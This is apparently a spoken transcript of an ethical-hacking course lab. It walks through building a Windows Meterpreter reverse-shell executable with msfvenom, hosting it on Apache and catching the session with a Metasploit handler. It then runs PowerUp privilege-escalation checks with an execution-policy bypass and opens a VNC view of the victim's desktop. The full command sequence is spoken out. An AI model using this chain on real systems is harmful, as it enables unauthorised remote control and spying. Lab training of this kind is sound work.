Module 6, Lab 1, Task 4, exploiting client-side vulnerabilities and establishing a VNC session. All right, we're going to switch to the Parrot security machine. And click the Mate terminal icon. Open a terminal window, and as usual, sudo su tour and cd enter to jump to the root directory. All right, now we're going to generate a malicious payload, MSF Venom, TAC-P for platform, payload, Windows, Meterpreter, reverse_TCP, TAC platform, Windows, TAC-A for architecture, x86, TAC-F, exe, lhost equals the IP address of the host machine, which will be my Parrot box at 10.10.1.13. L port equals 444. And output to home, attacker, desktop, test.exe. All right, I'm going to double check my syntax. P, Windows, Meterpreter, reverse TCP, platform Windows, architecture x86, TAC-F, exe, lhost, 10.10.1.13, L port 444, and output home attacker desktop test. Perfect. And press enter. That'll actually generate my exe MSF Venom payload. All right, when it's finished, we'll actually see a payload size of a non-zero value, indicating my syntax is correct. I'm sorry, final size of 73K, payload size 354 bytes. Now, if you have problems running this, one of the first things you're going to do is check the size of the file. If it's 0 bytes, you had a syntax error in the generation. All right, now we're going to create a directory to share the file with the target machine, provide the permissions, and copy the file from the desktop to the shared location using the following commands. mkdir var www html share, and press enter. Chmod TAC-R 755 var www html share, and enter. Change owner TAC-R data :www TAC data var www html and share, and press enter. All right, now we're going to copy the malicious file, cp home attacker desktop test to the var HTML share, up 2 bars. There we go. All right, now start the Apache service. To do this, we're going to type service Apache 2 start. And press enter, and then MSF console, and enter. All right, in the MSF console, we'll type use exploit multi and handler, and press enter. Now we're going to set the payload to Windows Meterpreter reverse underscore TCP and press enter. All right, set the local host to 10.10.1.13 and set local port to 444 and enter. All right, after entering the details, type exploit and hit enter, which starts our reverse TCP handler and waits for the connect back. All right, we're going to click the CEH Windows 11 machine and log in. And after logging in, we're going to launch a browser. And we're going to navigate to HTTP 10.10.1.13 and share. Oops. And there it is. Now, once we click on the test.exe file, we're going to get a pop-up. We're going to select Save File and automatically saved it. All right, the malicious file is now downloaded. We're going to navigate to the downloads location and double-click the test.exe file to run it. Go ahead and select Run. Now switch back to the Parrot machine. And we should see an established connection. There it is, Meterpreter session 1 opened. Now type sysinfo to get the system information of the connected client. So we got a Windows 11 box, x64, Meterpreter x86 Windows. All right, now we're going to do an upload root powersploit privilege escalation powerup.ps1, whoops, and press enter. This uploads our powersploit file to the target system's present working directory. All right, we're going to type in a shell and press enter to open a shell session and observe that our present working directory points to the downloads folder on the target system. All right, now be certain you type this syntax in correctly. It's a little bit counterintuitive with the extra dot. Type in PowerShell. Oops. Attack, execution, policy, bypass, attack, command, quote, dot, space, dot, slash, backslash, power up, dot, ps1, semicolon, invoke, attack all checks, quote, and press enter to run the file. Now again, extra space between the dots. We're not used to that. It's kind of a weird one. Double check your syntax. PowerShell, execution policy, bypass, attack command, quote, dot, space, dot, slash, power up ps1, invoke all checks, and that looks good. Okay, now a result should appear displaying check and abuse functions. And you might want to maximize your terminal window. And it looks like it's done. All right, now we're going to go ahead and type exit and exit the Meterpreter session. Now we're going to exploit a VNC vulnerability to gain remote access to the Windows 11 machine. To do so, we're going to type run VNC and press enter. Turn my channel, yes. All right. Run VNC and enter. Creates a VNC reverse TCP stager. And now we can see the victim's remote desktop. Very cool. All right, this concludes the demonstration of how to exploit client-side vulnerabilities and establish a VNC session using Metasploit. Go ahead and close all open windows, and that completes our lab.